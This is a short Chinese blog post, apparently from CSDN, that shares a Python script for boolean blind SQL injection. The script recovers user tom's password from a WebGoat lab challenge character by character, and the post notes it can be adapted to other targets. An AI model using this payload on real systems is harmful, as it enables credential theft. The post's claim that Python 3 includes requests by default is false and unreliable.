python实现sql盲注

本文分享了一段Python代码,用于通过SQL布尔盲注技术获取WebGoat SQL Injection (advanced)第5页用户tom的密码。代码使用requests库进行HTTP请求,并通过逐位猜测的方式实现了密码的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

背景介绍

本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔盲注获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。

代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他注入问题,可以简单修改本脚本。如果以后代码有较大优化,会更新本文。

代码

import requests


url = "http://192.168.101.16:8222/WebGoat/SqlInjectionAdvanced/challenge"
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "JSESSIONID=VjGdZj9IvzWQ9BJFIEar2--CEun-GVI0GnBVU7nE",}
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、特殊字符
answer = ''

for i in range(1,24):
    for c in keylist:
        payload = "tom' and substring(password,"+str(i)+",1)='"+c+"'-- ss"     #用substring逐位猜测密码
        formdata = {
        "username_reg":payload,
        "email_reg":"123@123.com",
        "password_reg":"12",
        "confirm_password_reg":"12",
        }
        response = requests.put(url, data = formdata, headers = headers)       #本题用的PUT方法传输客户端参数,如果遇到其他题目用POST方法,则改为requests.post
        if response.text.find("already exists") != -1:                         #猜对了的话返回结果会包含already exists
            answer = answer+c
            break
print(answer)                                                                  #打印结果

顺便感叹一下requests模块真好用。

我这里用的是python3,因为python3自带requests模块了,python2我看网上说也支持,但应该是要自己安装的。

评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值